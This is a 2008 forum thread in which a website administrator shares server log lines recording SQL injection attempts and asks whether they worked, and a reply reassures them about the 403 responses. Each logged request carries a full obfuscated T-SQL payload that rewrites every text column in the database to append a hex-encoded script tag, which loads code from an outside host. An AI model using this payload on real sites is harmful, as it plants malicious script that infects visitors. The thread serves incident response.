View previous topic :: View next topic |
Author |
Message |
Motiv Just Arrived
Joined: 17 Aug 2005 Posts: 0 Location: Seattle, WA
|
Posted: Thu Jun 05, 2008 3:07 pm Post subject: SQL Injection attempts on our website |
|
|
From the logs today:
2008-06-05 06:41:37 x.x.x.x GET /detail.aspx ID=5194;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 854 296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5194';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 3296
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 0 1744 854 281
2008-06-05 06:41:40 x.x.x.x GET /detail.aspx ID=5195';dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F666C797A68752E393936362E6F72672F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 80 - 140.129.22.12 HTTP/1.1 GoogleBot - - www.ourwebsite.com 403 6 64 0 855 249
What do you all make of this? I don't think it was successful - The http return code was 403 forbidden. I've been through the database and code on our pages making sure no yay fun scripts were being called from CommieVille.
|
|
Back to top |
|
|
Groovicus Trusted SF Member
Joined: 19 May 2004 Posts: 9 Location: Centerville, South Dakota
|
|
Back to top |
|
|
Motiv Just Arrived
Joined: 17 Aug 2005 Posts: 0 Location: Seattle, WA
|
Posted: Thu Jun 05, 2008 3:40 pm Post subject: |
|
|
How can I make sure it wasn't successful?
I read over the post on the link you provided and found none of those malicious files on the web server.
Which table in the database should I be looking at? looks like a table named cursor if I am reading right?
|
|
Back to top |
|
|
Groovicus Trusted SF Member
Joined: 19 May 2004 Posts: 9 Location: Centerville, South Dakota
|
Posted: Thu Jun 05, 2008 3:51 pm Post subject: |
|
|
If the return code was a 403 error, then the attack was not successful. Are any of your webpages showing javascript that does not belong? I do not use asp or Microsoft SQL, so I don't know all that much about it, but there are quite a few pages that discuss it in depth. Perhaps one of them has detection measures.
|
|
Back to top |
|
|
|